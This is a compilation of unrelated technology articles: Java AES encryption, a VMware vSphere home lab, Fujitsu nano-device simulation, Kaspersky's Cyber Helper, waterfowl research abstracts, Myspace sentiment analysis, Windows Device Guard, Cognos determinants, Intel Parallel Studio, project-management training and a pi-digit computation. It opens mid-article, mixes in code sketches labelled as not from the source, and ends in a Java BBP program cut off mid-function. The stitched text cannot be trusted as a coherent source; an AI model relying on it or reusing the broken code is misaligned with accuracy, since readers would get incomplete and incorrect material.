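The rest of the article walks through configuring those layers. For orientation, the application-level view is just the standard JCA/JCE API: the same Java code runs whether the work is done in software, by CPACF or on a Crypto Express card, because the routing is decided by whichever provider is configured (for example, a PKCS#11 provider backed by openCryptoki). The sketch below is a minimal, provider-agnostic AES encrypt/decrypt round trip and is not taken from the article; the class name, key length and message are illustrative only.

    import java.nio.charset.StandardCharsets;
    import java.security.SecureRandom;
    import javax.crypto.Cipher;
    import javax.crypto.KeyGenerator;
    import javax.crypto.SecretKey;
    import javax.crypto.spec.IvParameterSpec;

    public class AesRoundTrip {
        public static void main(String[] args) throws Exception {
            // Generate a 128-bit AES key. With a hardware-aware provider configured,
            // the same calls can be served by CPACF rather than a software implementation.
            KeyGenerator keyGen = KeyGenerator.getInstance("AES");
            keyGen.init(128);
            SecretKey key = keyGen.generateKey();

            // AES in CBC mode needs a random 16-byte initialization vector.
            byte[] iv = new byte[16];
            new SecureRandom().nextBytes(iv);
            IvParameterSpec ivSpec = new IvParameterSpec(iv);

            byte[] plaintext = "Hello, hardware crypto!".getBytes(StandardCharsets.UTF_8);

            // Encrypt.
            Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
            cipher.init(Cipher.ENCRYPT_MODE, key, ivSpec);
            byte[] ciphertext = cipher.doFinal(plaintext);

            // Decrypt with the same key and IV and print the recovered message.
            cipher.init(Cipher.DECRYPT_MODE, key, ivSpec);
            byte[] recovered = cipher.doFinal(ciphertext);
            System.out.println(new String(recovered, StandardCharsets.UTF_8));
        }
    }

In a hardware-enabled setup the application code typically stays exactly like this; only the provider configuration (in java.security, or an explicit provider argument to getInstance) changes.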
Building a Home Lab for VMware vSphere 6.0

This paper will discuss how to (relatively) inexpensively set up a simulated lab environment using VMware (the latest version). This white paper is broken down into three major sections: the first and most detailed is about the hardware required, the second is about the VMware Workstation configuration, and the third is about installing vSphere (ESXi) 6.0 and Virtual Center (VC).

Before virtualization, I had many computers around my house that required maintenance, upgrading, replacement, etc., as well as the power to run all of the equipment. This was very time-consuming and expensive. In 1999, I began using VMware Workstation 2.0 to create virtual machines (VMs) to study NetWare, NT 4.0, Windows 2000, etc. Since that time, I have used it in all of my studies and reduced my lab equipment to one computer, a powerful laptop. Originally, Elastic Sky X (ESX) didn't run in a VM, requiring more hardware to study and learn ESX. As of ESX 3.5 and Workstation 6.5.2, it became possible to virtualize ESX in a Workstation VM (or inside a vSphere server, for that matter, but we won't be discussing that in this white paper), although this required workarounds and was not supported. It is possible to run ESXi 6.0 inside of ESXi 6.0 or VMware Workstation 8.0 or higher. In fact, VMware and Global Knowledge teach their vSphere 6.0 courses in this manner (running ESXi inside ESXi). Using ESXi as the host virtualization platform works, but it requires a dedicated machine. This is often possible in a business setting, but may be difficult for a small business or in circumstances where spare hardware is not available. Hence, this white paper will discuss how to use Workstation 11.0 (the latest version) to create the simulated environment. I often get asked by my students how to (relatively) inexpensively set up this kind of lab for study after class, and the result is this white paper. When specific vendors are mentioned, it is not an endorsement, but rather just an example of something that I have used and know works. Note that this white paper is not intended to be an in-depth review of how to install and configure vSphere, as that is taught in the VMware classes and a VMware class is required for certification.

The biggest question is whether to build your lab at a stationary location, such as in your home or on a spare server at work, or whether it needs to be portable. In many cases, a stationary configuration is sufficient, so the desktop/server route works well and is usually less expensive. If you need to do demonstrations for customers, study at multiple locations, etc., then a laptop configuration may work better for you, though it will cost more for a similar configuration.

As far as minimum central processing unit (CPU) requirements are concerned, you'll need at least two cores (or CPUs) to be able to install ESXi and/or VC, but this will be very slow. I suggest a minimum of 4 cores (or CPUs, preferably hyperthreaded) so there is enough CPU power to run the VMs and the host operating system (OS). Eight or more cores work well.
If you're planning on creating and using input/output (I/O)-intensive VMs, and/or running many VMs, and/or doing a lot on the host OS while VMs are running, you should consider more than 12 cores. Remember that ESXi 6.0 (vSphere 6.0) requires 64-bit-capable CPUs to run, so be sure to purchase 64-bit-capable CPUs with either Intel Virtualization Technology (VT) or Advanced Micro Devices virtualization (AMD-V) support, both physically present on the CPU and enabled in the basic input/output system (BIOS). I point this out not because you are likely to purchase a decade-old computer that doesn't have a 64-bit CPU, but rather because the virtualization extensions in the processor may not be made available via the BIOS. ESXi also requires the No Execute/Execute Disable (NX/XD) feature to be enabled in the BIOS.
The research division of Fujitsu has used advanced supercomputing techniques to successfully simulate the electrical properties of a 3,000-atom nano device, a threefold increase from previous research. The company notes that at the nanoscale level, minute differences in the local atomic configuration can have a major impact on the electrical properties of a device. The challenge is such that it requires the first-principles method of calculation to accurately calculate the behavior of each atom. This method determines physical properties from the basic laws of quantum mechanics that govern atoms and electrons. Computational simulation is well regarded for supporting a development process that is faster and more cost-effective than physical experimentation. But in this case, there’s a catch. When the first-principles method is applied to electrical property forecasting, the computations involved are so large that forecasts are generally limited to the order of 1,000 atoms. At this scale, only channel regions – the pathways for electricity – are able to be calculated. A more desirable simulation will incorporate interactions with thousands of adjacent electrodes and insulators – which are understood to greatly affect electrical properties. Until now, this has been considered an intractable problem. Fujitsu Labs came up with a new technique based on massively-parallel supercomputing technology developed by the Japan Advanced Institute of Science and Technology (JAIST) and the Computational Material Science Initiative (CMSI). The new calculation technique reduces memory requirements while maintaining precision. With this approach, it is possible to calculate the electrical properties, not only of individual nano device components, but of the interactions between these components. The advancements have already enabled a successful 3,000 atom scale application, and the researchers anticipate that this development will make way for faster practical implementations of nano devices. As silicon-based devices come against the limits of miniaturization, there is increased interest in developing new materials and types of structures that can increase speed and energy-efficiency. Nanotechnology offers a promising path to sustaining Moore’s Law-type returns. “This technology, being capable of modeling the electrical properties of a 3,000-atom nano device, was used to discover the electrical properties of a nano device that included interactions with its environment, making a significant step toward the design of new nano devices,” notes the official release announcement. As ever-more massive parallel computing technology and more performant supercomputers become available, Fujitsu will continue to experiment with larger-scale and more efficient calculations. Going forward, Fujitsu is pursuing nano device design through total simulations of nano devices at the 10,000 atom scale.
Cyber Helper, an artificial intelligence system developed by Kaspersky Lab in 2009, is designed to automate the process of combating malware. Cyber Helper includes several autonomous subsystems capable of data exchange and interoperability. It also contains several 'hard' algorithms and rules of the kind used in standard programs. However, most of its subsystems utilize artificial intelligence and fuzzy logic and independently define their own behavior as they go about solving different tasks.

The main task facing those developing artificial intelligence is to create an autonomous AI system fully capable of learning, making informed decisions and modifying its own behavioral patterns in response to external stimuli. In most cases artificial intelligence is based upon experience and knowledge provided by humans in the form of behavioral examples, rules or algorithms, which means it is not very effective at meeting the challenges of modern computer virology. With Cyber Helper the aim was to create a self-learning system capable of conducting independent research and accumulating knowledge and experience. As a result, the system not only learns but, based on its knowledge and the result of its own analysis of an object, periodically finds errors in the analyst's work. In such cases, Cyber Helper may start by interrupting the analysis and decision-making process and sending a warning to the expert, before going on to block scripts that would otherwise be sent to the user and that, from the system's perspective, could harm the user's computer. The simplest example of such a mistake might be when a malware program substitutes an important system component: on the one hand it is necessary to destroy the malware program, while on the other, doing so may result in irrecoverable system damage.

At the heart of the Cyber Helper system is a utility called AVZ that was created to automatically collect data from potentially infected computers and store it in machine-readable form for use by other subsystems, as well as to perform actions on a remote computer using universal scripts. The utility generates reports in HTML and XML formats. From 2008 onwards, the core AVZ program has been integrated into Kaspersky Lab's antivirus solutions and can be used for infection treatment if necessary.

"Modern malware programs act and propagate extremely fast. In order to respond immediately, the intelligent processing of large volumes of non-standard data is required," says Oleg Zaitsev, the developer behind Cyber Helper and Chief Technology Expert at Kaspersky Lab. "Artificial intelligence is ideally suited to this task; it can process data far in excess of the speed of human thought. Cyber Helper is one of only a handful of successful attempts to get closer to the creation of autonomous artificial intelligence. The main advantage of Cyber Helper is that, like an intelligent creature, it is able to self-learn and define its own actions in an independent manner."

You can find out more by reading the article "Cyber Expert: Artificial Intelligence in the Realms of IT Security" at www.securelist.com/en.
Humburg D.D.,Ducks Unlimited Inc. | Anderson M.G.,Institute for Wetland and Waterfowl Research Wildfowl | Year: 2014 The North American Waterfowl Management Plan (NAWMP) is a continental ecosystems model for wildlife conservation planning with worldwide implications. Since established in 1986, NAWMP has undergone continual evolution as challenges to waterfowl conservation have emerged and information available to support conservation decisions has become available. In the 2012 revision, the waterfowl management community revisited the fundamental basis for the Plan and placed greater emphasis on sustaining the Plan's conservation work and on integration across disciplines of harvest and habitat management. Most notably, traditional and nontraditional users (i.e. hunters and wildlife viewers) of the resource and other conservation supporters are integrated into waterfowl conservation planning. Challenges ahead for the waterfowl management enterprise include addressing tradeoffs that emerge when habitat for waterfowl populations versus habitat for humans are explicitly considered, how these objectives and decision problems can be linked at various spatial and temporal scales, and most fundamentally how to sustain NAWMP conservation work in the face of multi-faceted ecological and social change. © Wildfowl & Wetlands Trust. Source

Plattner D.M.,Southern Illinois University Carbondale | Eichholz M.W.,Southern Illinois University Carbondale | Yerkes T.,Ducks Unlimited Inc. Journal of Wildlife Management | Year: 2010 A bioenergetic approach has been adopted as a planning tool to set habitat management objectives by several United States Fish and Wildlife Service North American Waterfowl Management Plan Joint Ventures. A bioenergetics model can be simplified into 2 major components, energetic demand and energetic supply. Our goal was to estimate habitat-specific food availability, information necessary for estimating energy supply for black ducks (Anas rubripes) wintering on Long Island, New York, USA. We collected both nektonic and benthic samples from 85 wetland sites dispersed among 5 habitat types (salt marsh, mud flat, submersed aquatic vegetation, brackish bay, and freshwater) commonly used by black ducks in proportion to expected use. Biomass varied among habitats (F(4,5) > 7.46, P < 0.03) in 2004-2005, but there was only marginal variation in 2005-2006 (F(3,4) = 5.75, P = 0.06). Mud flats had the greatest biomass (1,204 kg/ha, SE = 532), followed by submersed aquatic vegetation (61 kg/ha, SE = 18), and salt marsh (34 kg/ha, SE = 6). In the second year of the study, freshwater had the greatest biomass (306 kg/ha, SE = 286), followed by mud flats (85 kg/ha, SE = 63), and salt marsh (35 kg/ha, SE = 4). Our results suggest food density on wintering grounds of black ducks on coastal Long Island is considerably lower than for dabbling ducks using inland freshwater habitats, indicating black duck populations are more likely than other species of dabbling ducks to be limited by winter habitat. We recommend targeting preservation, restoration, and enhancement efforts on salt marsh habitat. © 2010 The Wildlife Society. Source

Smith A.,Ducks Unlimited Inc. Journal of Spatial Science | Year: 2010 This paper describes an approach to using the Random Forest classification algorithm to quantitatively evaluate a range of potential image segmentation scale alternatives in order to identify the segmentation scale(s) that best predict land cover classes of interest.
The image segmentation scale selection process was used to identify three critical image object scales that when combined produced an optimal level of land cover classification accuracy. Following segmentation scale optimization, the Random Forest classifier was then used to assign land cover classes to 11 scenes of SPOT satellite imagery in North and South Dakota with an average overall accuracy of 85.2 percent. © 2010 Surveying and Spatial Sciences Institute and Mapping Sciences Institute, Australia. Source Peron G.,Colorado State University | Peron G.,U.S. Geological Survey | Walker J.,Ducks Unlimited Inc. | Rotella J.,Montana State University | And 2 more authors. Ecology | Year: 2014 Birds and their population dynamics are often used to understand and document anthropogenic effects on biodiversity. Nest success is a critical component of the breeding output of birds in different environments; but to obtain the complete picture of how bird populations respond to perturbations, we also need an estimate of nest abundance or density. The problem is that raw counts generally underestimate actual nest numbers because detection is imperfect and because some nests may fail or fledge before being subjected to detection efforts. Here we develop a state-space superpopulation capture-recapture approach in which inference about detection probability is based on the age at first detection, as opposed to the sequence of re-detections in standard capture-recapture models. We apply the method to ducks in which (1) the age of the nests and their initiation dates can be determined upon detection and (2) the duration of the different stages of the breeding cycle is a priori known. We fit three model variants with or without assumptions about the phenology of nest initiation dates, and use simulations to evaluate the performance of the approach in challenging situations. In an application to Blue-winged Teal Anas discors breeding at study sites in North and South Dakota, USA, nesting stage (egg-laying or incubation) markedly influenced nest survival and detection probabilities. Two individual covariates, one binary covariate (presence of grazing cattle at the nest site), and one continuous covariate (Robel index of vegetation), had only weak effects. We estimated that 5-10% of the total number of nests were available for detection but were missed by field crews. An additional 6-15% were never available for detection. These percentages are expected to be larger in less intense, more typical sampling designs. User-friendly software nestAbund is provided to assist users in implementing the method. © 2014 by the Ecological Society of America. Source Lindberg M.S.,University of Alaska Fairbanks | Schmidt J.H.,National Park Service | Walker J.,Ducks Unlimited Inc. Journal of Wildlife Management | Year: 2015 We examined changes in the pathways used for inference in The Journal of Wildlife Management (JWM) and 2 other applied journals during recent decades. Although null hypothesis significance testing is still the main approach to inference, use of information-theoretic approaches based on Akaike's Information Criterion (AIC) has rapidly grown to be a common form of inference in JWM and related journals. We observed little growth in the use of other information criteria such as Bayesian Information Criterion (BIC). The use of information criteria for multimodel inference has addressed some of the criticisms of significance testing. 
However, information criteria still need to be used appropriately, with a priori hypotheses, to be valid. In addition, much work remains to be done on applying information criteria to more complex models such as hierarchical and Bayesian models. © 2015 The Wildlife Society. Source
Computers may soon be able to police online chat rooms and social networking sites for signs of bullying, flaming and negative comments. Work by a consortium of European universities and research organisations aims to develop software capable of taking the emotional temperature of online postings in Myspace and other internet communities. The same technology could be used to improve the way computer systems respond to human queries, allowing them to respond differently according to whether users are frustrated or happy.

Professor Mike Thelwall, professor of information science at the University of Wolverhampton, is spearheading the UK's contribution to the project. The university has developed software capable of taking the emotional temperature of postings on social networking sites. The group is using sample data from Myspace, but the principles could be applied to any site. "The challenging thing has been tailoring something that ought to work in theory for the way it works in Myspace," he says. "For example, in normal text you could look for the word 'happy', but in Myspace it might be happy with seven a's. We have to recognise that happy with seven a's means happy and that it is more positive than happy with one a."

After three months' development work, the software is able to assess the emotional content of postings with an accuracy of 60% - as good as a human reader. "We were surprised by the sheer volume of positive emotion in Myspace and how little negative emotion there was. Especially among male users, insulting your friends is something you do, but that does not seem to go on in Myspace," Thelwall says.

The four-year project aims to analyse and understand the emotional dynamics of people interacting online. The work could help to improve the design of social networking sites in the future. "We have simulation experts that will simulate how emotions flow around the system. If one person is very positive, how will that flow around the system? If one person is very negative, what impact will that have? It might be that some negative comments are necessary to keep a system alive, as negative comments can generate debate," he says.

Ultimately, the work may lead to software that can take the emotional temperature of comments on social networking sites in real time. One problem is that a comment made as a joke online could be taken the wrong way by others. Offenders could either be sent an automatic warning or be referred to a moderator, says Thelwall. "Expressing a negative emotion in a chat room can have serious consequences because so many young people are online," he says. "Hopefully the software will detect if someone is being bullied or flamed."

Part of the work will be to assess the impact that emotional statements have on individuals using online services. For example, researchers plan to use electrodes to measure volunteers' responses to positive and negative comments in chat rooms. "We are going to try to extend our methods to work with lots of other types of internet discussions," he says.
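The article does not publish the project's actual algorithm, but the elongation example Thelwall gives is easy to make concrete. The Java sketch below is purely illustrative: it collapses stretched words such as "haaaaaaappy" back to the dictionary form and uses the amount of repetition as a crude intensity boost. The tiny word list, the scores and the boost factor are all invented for the example; a real classifier would use a much larger weighted lexicon and many more features.

    import java.util.Map;

    public class ElongationSentiment {
        // Tiny illustrative lexicon; a real system would use a large, weighted word list.
        private static final Map<String, Integer> LEXICON =
                Map.of("happy", 2, "love", 3, "sad", -2, "hate", -3);

        // Collapse runs of three or more identical letters, e.g. "haaaaaaappy" -> "happy".
        static String normalize(String word) {
            return word.toLowerCase().replaceAll("(.)\\1{2,}", "$1");
        }

        // Number of letters dropped by normalization, used as a crude intensity signal.
        static int elongation(String word) {
            return word.length() - normalize(word).length();
        }

        // Score a posting: base lexicon score per word, nudged by elongation (assumed boost factor).
        static double score(String posting) {
            double total = 0.0;
            for (String raw : posting.split("\\W+")) {
                if (raw.isEmpty()) continue;
                Integer base = LEXICON.get(normalize(raw));
                if (base != null) {
                    total += base * (1.0 + 0.1 * elongation(raw));
                }
            }
            return total;
        }

        public static void main(String[] args) {
            System.out.println(score("so haaaaaaappy today"));  // stronger positive
            System.out.println(score("so happy today"));        // plain positive
        }
    }

Run on a short posting, the stretched form scores higher than the plain one, mirroring the behaviour described above.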
Cyber-attacks commonly occur through applications, browsers, un-patched vulnerabilities, or social engineering. Deploying Device Guard (a central feature in the suite of Microsoft's Windows 10 security features) does not eliminate the possibility of being targeted for attacks, but it does significantly reduce the attack surfaces favored by bad actors and malware writers. What Device Guard does is harden those various attack surfaces by creating a "chain of trust" from the hardware and firmware configuration involved in the boot process, up through the Windows OS kernel and on to software running in Windows. The aim is to ensure all components involved are trusted and have not been compromised or tampered with at any time. This is called defense-in-depth security: the endpoint is secured in multiple layers rather than focusing on just one layer and ignoring others. However, deploying Device Guard is no cup of tea, nor is it for the faint of heart. There are a number of components in its architecture and detailed processes to follow. Learning more about Device Guard is sure to present some new concepts in Windows that are worth taking the time to understand. In this white paper, which I have co-authored with Dave Fuller, we not only give readers a greater understanding of how Device Guard works, but – much more importantly – explain how you can implement it and develop your 'whitelist' of trusted applications. It's a real must-read for anyone aiming for a secure Windows 10 for their business.
Determinants can play a crucial role in the overall performance and consistency of your Framework Manager model, but they remain one of the most confusing aspects of the application to most developers. This article will attempt to end the confusion.

Determinants are used so that a table of one grain (level of detail) behaves as if it were actually stored at another grain. They are primarily used for dimension tables where fact tables join to dimension tables at more than one level in the dimension. (There are other cases where you could use them, but they are less common and fairly specific situations.)

Let's use the example of a date dimension table with day-level grain. If all the fact tables join at the day level, the most detailed level, then you do not need determinants. But as many of us know from experience, this is not always the case. Fact tables are often aggregated or stored at different levels of granularity for a number of reasons. The trouble arises when you wish to join to the dimension table at a level that is not the lowest level. Consider a monthly forecast fact table which is at the month level of detail (1 row per month). A join to the month_id (e.g. 2009-12) would return 28 to 31 records (depending on the month) from the date dimension, and throw off the calculations. Determinants solve this problem.

Often when modeling, it's useful to think about the SQL code you would like to generate. Without determinants, the incorrect SQL code would look something like this (the select list is omitted here):

    SELECT ...
    FROM SALES_FORECAST F
    INNER JOIN DATE_DIM D
        ON F.MONTH_ID = D.MONTH_ID

This code will retrieve up to 31 records for each of the sales forecast records. Applying mathematical functions, for example Sum and Count, would produce an incorrect result. What you would like to generate is something along the following lines, which creates a single row per month and then joins to the fact table:

    SELECT ...
    FROM SALES_FORECAST F
    INNER JOIN (
        SELECT DISTINCT MONTH_ID, ...
        FROM DATE_DIM
    ) AS D1
        ON F.MONTH_ID = D1.MONTH_ID

As shown above, the trick is to understand which columns in the dimension table are related to the month_id, and therefore are unique along with the key value. This is exactly what determinants do for you.

Unraveling the Mystery in Framework Manager

Following Cognos best practices, determinants should be specified at the layer in the model in which the joins are specified. Here we see a date dimension with 4 levels in the dimension: Year, Quarter, Month and Day. This means we can have up to 4 determinants defined in the query subject, depending on the granularity of the fact tables present in your model. The first three levels, Year, Quarter and Month, should be set to "group-by" as they do not define a unique row within the table, and Framework Manager needs to be made aware that the values will need to be "grouped" to this level. In other words, the SQL needs to "group by" a column or columns in order to uniquely identify a row for that level of detail (such as Month or Year). The Day level (often called the leaf level) should be set to "uniquely identified", as it does uniquely identify any row within the dimension table. While there can be several levels of "group by" determinants, there is typically only one uniquely identified determinant, identified by the unique key of the table. The "uniquely identified" determinant by definition contains all the non-key columns as attributes, and is set automatically at table import time, if it can be determined.
The Key section identifies the column or columns which uniquely identify a level. Ideally, this is one column, but in some cases it may actually need to include more than one column: for example, if your Year and Month values (1-12) are stored in separate columns. In short, the key is whatever columns are necessary to uniquely identify that level. In our date dimension, the key for the Month level is the MONTH_ID column.

The Attributes section identifies all the other columns which are distinct at that level. For example, at the month_id level (e.g. 2009-12), columns such as month name, month starting date and number of days in the month are all distinct at that level. And obviously items from a lower level, such as date or day-of-week, are not included at that level.

Technically, the order of the determinants does not imply levels in the dimension. However, columns used in a query are matched from the top down, which can be very important to understanding the SQL that will be generated for your report. If your report uses Year, Quarter and Month, the query will group by the columns making up the Year-key, Quarter-key and Month-key. But if the report uses just Year and Month (and not the Quarter) then the group by will omit the Quarter-key.

How Many Levels Are Needed?

Do we need all 4 levels of determinants? Keep in mind that determinants are used to join to dimensions at levels higher than the leaf level of the dimension. In this case, we're joining at the month level (via month_id). Unless there are additional joins at the year or quarter level, we do not strictly need to specify those determinants. Remember that year and quarter are uniquely defined by the month_id as well, and so should be included as attributes related to the month, as shown.

Following these simple steps, the SQL generated for your report will contain a section produced by the determinant settings. Notice how it groups by the MONTH_ID and uses the min function to guarantee uniqueness at that level. (No, it doesn't trust you enough to simply do a SELECT DISTINCT.) The second level of group by is the normal report aggregation by report row. So the result is that the join is done correctly, with each monthly fact record joined to 1 dimension record at the appropriate level, to produce the correct values in the report.
There is a set of factors creating the environment where Microsoft and mainstream parallel computing come face to face, so there is a need to ensure that a robust and workable bridge exists between the two. That was the basis underpinning the recent Intel Parallel Computing Conference in Salzburg.

On the hardware side the factors are the multicore processors from the likes of Intel and AMD. Now all servers sold by the major vendors have four-core processors as standard, which means that, as the server upgrade cycle drifts through the user base, even the smallest user is equipped for a measure of parallel computing. With six-core devices coming available at the server high end, and eight-core coming next year, the next 12 months will see the parallel processing performance of bog-standard servers expand significantly. And that is just in the traditional x86-architecture environment. There is widespread speculation and experimentation about the potential of so-called 'manycore' specialist devices such as Nvidia's graphics processor. These devices, with 32 or more cores per processor, are seen as a powerful alternative platform option capable of running mainstream business services and applications for those users looking to take the parallel route seriously. Intel is well aware of this potential, as it is already talking openly about its own upcoming graphics chip, codenamed Larrabee, as a contender for mainstream parallel processing as well. Published simulation results suggest this will have up to 32 x86-architecture cores available to start with.

On the software side Microsoft is a major player in the mainstream of business applications and operating systems and, while there have to be some doubts about its current capabilities at supporting and exploiting the potential of parallelism, neither the company nor Intel is going to ignore the need for new tools to help applications developers move towards parallelism with both new applications and the adaptation of legacy ones. The need is, after all, already growing fast as eight-core processors—and the potential of 32-core Larrabee devices—arrive next year.

It fell to James Reinders, Intel's Chief Software Evangelist and Director of Software Development Products, to outline the new package of development tools the company has brought together to help applications developers maximise the productivity of parallelizing C++ applications using Visual Studio on Windows. Intel already has a suite of development tools for developing C++ and Fortran applications on Linux and MacOS, such as the MPI Library, Cluster Toolkit, Thread Checker, VTune and the Math Kernel Library. Reinders describes these as tools for experts, and now the need is for tools that meet the needs of the rest of the world. This is the objective behind the new packaged set of tools, Parallel Studio, that Intel is formally introducing on May 26th. This integrates the updated existing tools with Visual Studio-related additions in a fully integrated package.

According to Reinders, all tools in parallel applications development need to address two aspects—helping with correctness and with scaling. They should also provide the appropriate level of abstraction so that issues like maintainability and future proofing are ensured. This is important, particularly in the mainstream, where operating systems, language compilers and applications code need to demonstrate a degree of platform independence as upgraded hardware is introduced.
Parallel Studio helps with these important development issues, helping Microsoft developers from the start point of applications design—where to start parallelizing—through to the tuning of the final program. Everything plugs in with Visual Studio 'very tightly', according to Reinders. There are a number of Visual Studio-specific component tools included in Parallel Studio.

Parallel Composer provides the coding and debug capabilities, with an optimised C++ compiler. It can also invoke Integrated Performance Primitives directly from the math library component, as well as supporting lambda functions.

Parallel Inspector helps with determinism issues such as data races or deadlocks. This is an updated version of Intel Thread Checker that includes a memory checker that can handle threading in a parallel environment. It is designed to help identify problem areas when parallelising existing applications that have worked OK serially, but don't work in a parallel environment because of memory problems. It is particularly useful for identifying memory leaks and threading errors, which can be a real problem in parallelising applications. As well as identifying the source of a threading problem, it also locates and displays the relevant source code.

Parallel Amplifier is designed to identify bottlenecks and can show what it is in the source code that is causing the problem. It can also show where locks—used to ensure function synchronisation in parallel applications—are in practice causing delays. It can also help scale performance by making use of additional cores. This is expected to be very useful for the applications tuning phase, as it can generate a wide range of statistics and analysis, such as identifying differences that might occur with multiple runs. A short-term goal with Amplifier is its ability to help make applications run faster on multicore platforms by helping developers work out how the application will perform and identify potential trouble spots in advance. This is achieved with analysis tools for hot spot analysis, which finds where the application is spending too much time; locks and waits analysis, which identifies where bottlenecks exist; and concurrency analysis, which determines where and when cores are idle. According to Reinders, concurrency analysis should be particularly useful for helping to move serial code to parallel and keep it effective.

Most of these tools work on AMD processors just as well as on Intel, though Reinders did state that this was not always the case for Parallel Amplifier because of the way that has been optimised to work with Intel processors.
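Parallel Studio targets C, C++ and Fortran, but the defect classes Inspector looks for are language-neutral. As a purely illustrative sketch - in Java rather than the C++ these tools actually analyse - the following program contains the classic data race such a correctness tool is built to flag: two threads increment a shared counter without synchronisation, so updates are lost and the final total usually comes out below the expected two million.

    public class RaceDemo {
        // Shared mutable state updated by two threads without synchronisation.
        private static int counter = 0;

        public static void main(String[] args) throws InterruptedException {
            Runnable work = () -> {
                for (int i = 0; i < 1_000_000; i++) {
                    counter++;  // read-modify-write is not atomic, so updates can be lost
                }
            };

            Thread t1 = new Thread(work);
            Thread t2 = new Thread(work);
            t1.start();
            t2.start();
            t1.join();
            t2.join();

            // Expected 2,000,000; typically prints less because of the data race.
            System.out.println("counter = " + counter);
        }
    }

Making the increment atomic or guarding it with a lock removes the race; profiling tools of the Amplifier kind then show whether the lock that fixed correctness has become the new scaling bottleneck.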
Intel is, of course, not pursuing this track alone, and Microsoft has got a new version of Visual Studio (VS 2010) specifically for parallel systems on the stocks. This has already reached the community technology preview stage, and should be available in beta by mid-year. Reinders was, however, keen to point out that Parallel Studio is better than Visual Studio 2010, not least because it supports multiple versions of Visual Studio—and because it is available now. The support for multiple versions of Visual Studio is obviously important, in that Microsoft's approach is inevitably geared to providing parallelism in the next iteration of Visual Studio—therefore pushing developers towards an upgrade. The ability of Parallel Studio to work with existing versions of Visual Studio—2005, 2008 and the upcoming 2010—should allow developers to add parallelization capabilities while remaining on a development tool they know and understand. The existing toolset has not been forgotten in all this, with many of the enhancements developed for Parallel Studio being incorporated in the next upgrade. VTune will get new features in June, including key enhancements taken from Parallel Amplifier—though some of these are only expected to appear next year. Thread Checker will get enhancements taken from Parallel Inspector, and the Fortran and C++ compilers will continue to track standards.
Teaching Project Management Skills

Information technology is no longer just about creating a product; it's also about managing the process of development. "The IT industry initially was operating more like a fly-by-night kind of operation," said Hans Jonasson, senior instructor with ESI International. "There were a lot of studies in the '80s and '90s. One organization, The Standish Group, [looked] at the status of the software industry, and they found that less than one-third of all projects [were] successful. That was the wake-up call, and some people said, 'Maybe it's not enough to just sit down and program something. We have to make sure that we understand what a customer wants, what are the time frames, what are the business goals, and we have to organize [that] process.'"

As a result, project management is a growing trend, and more organizations are expecting their IT professionals to have some experience in this area. Jonasson used the analogy of a vacation: You don't just go on vacation. You have to plan and prepare. "You don't just go down to the airport, buy the tickets and then see what happens," he explained. "You do some research, you decide where you want to go, you plan, you get hotel rooms [and] you get your tickets. That's really what project management is."

To teach the skills necessary for project management, trainers should use case studies or simulations in conjunction with lectures and discussions. "It's critical because a lot of people learn by doing, and they learn [from] their mistakes," Jonasson said. "[For example, if] I did this in my simulation or my application and people quit on me, why did that happen? To be able to analyze the impact of project management decisions, you [can't] just do lecturing. You have to practice, you have to discuss [and] you have to analyze why you [made] these decisions and what other options did you have?"

Teaching project management, though, is different from teaching technical skills. "When you do traditional technical training, there normally is a right answer and a wrong answer, so it's relatively black-and-white," Jonasson said. "In project management training, that is not the case. When you have a discussion, you get a question, [and] the answer is, 'It depends.' So it's much more scenario-based."

For this reason, trainers who are teaching IT professionals about project management should do an icebreaker before class begins to get everyone loosened up. "IT people initially are a little bit hesitant in opening up, being open-minded, getting into the gray areas. So it's important in the beginning of the class to do some team-building, icebreaker kinds of activities to get everyone comfortable," Jonasson said. "If you just go in and do your lecture, you will lose them."

As with any training, it's important to provide support after the session ends, too. "One of the things we do in ESI courses is have an action plan that students develop during the class where we look at what we have talked about in the class, what lessons have you learned and now how do you bring that back into your work environment?" Jonasson said. "Ideally, the students will meet back at work with their supervisors and say, 'Here are some of the things we picked up in class; now how do we use that in our environment?' Ongoing support within the organization when they get back from the classroom is critical."

- Lindsay Edmonds Wickman, firstname.lastname@example.org
The Australian is reporting on another breakthrough accomplishment made possible by advances in supercomputing. A group of researchers from the University of Newcastle, Lawrence Berkeley National Laboratory and IBM Australia used a BlueGene/P supercomputer to solve a mathematical calculation previously considered impossible. The team, led by Newcastle's Laureate Professor Jon Borwein, calculated digits beginning at the ten trillionth position (in two different number bases) of the mathematical constant pi squared, as well as Catalan's constant. Widely used in the fields of geometry, physics and other mathematical analyses, pi is the ratio of the circumference of a circle to its diameter.

The computations involved a total of approximately 1.549 x 10^19 floating-point operations, which according to Professor Borwein represents the largest single computation done for any mathematical object. He comments, "By combining human ingenuity with the awesome power of the BlueGene/P computer, we came up with an algorithm that allows us to identify potential weaknesses in computer system hardware and software. The scheme that we used enables one to compute digits of mathematical constants, including the square of the mathematical constant pi, without knowing any previous digits. It was like we stuck our hand deep into the mathematical universe and pulled out the exact data."

The work was performed on a 4-rack IBM BlueGene/P system located at IBM's Benchmarking Centre in Rochester, Minn. What would have taken a single CPU about 1,500 years to process, the Big Blue machine ran through in just months, and this is a shared machine; a dedicated machine of equal power would have taken less time. The researchers, who were accessing the machine remotely from Australia, did have the benefit of time-shifting: due to the time difference, they were able to use the system during its natural downtime.

Professor Borwein, a world-renowned expert in pi calculations, explains how this latest development applies to a new field of study known as quantum randomness, which he describes as "using natural processes to build random things." The research could lead to better random number generators: If we could prove pi squared was random in some sense then we could use it instead of all the expensive quantum random number generators or pseudo-random number generators that make all of our banking codes safe. A prototype is in the works for later this year.

The group's paper, "The Computation of Previously Inaccessible Digits of π² and Catalan's Constant," is available online.
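The team's formulas for π² and Catalan's constant are beyond a short example, but the underlying trick - computing digits at an arbitrary position without computing any of the earlier ones - is the same one made famous by the Bailey-Borwein-Plouffe (BBP) formula for π itself. The Java sketch below is a hypothetical illustration of that idea, not the researchers' code: it extracts hexadecimal digits of π starting at a chosen position, and its double-precision arithmetic limits it to modest positions (millions of digits, nowhere near the ten trillionth).

    public class BbpPi {
        // pi = sum_{k>=0} 16^-k * (4/(8k+1) - 2/(8k+4) - 1/(8k+5) - 1/(8k+6)).
        // Hex digits after position d come from the fractional part of 16^d * pi.

        // 16^p mod m by binary exponentiation.
        static long powMod16(long p, long m) {
            long result = 1 % m, base = 16 % m;
            while (p > 0) {
                if ((p & 1) == 1) result = (result * base) % m;
                base = (base * base) % m;
                p >>= 1;
            }
            return result;
        }

        // Fractional part of sum_k 16^(d-k) / (8k + j).
        static double series(int j, long d) {
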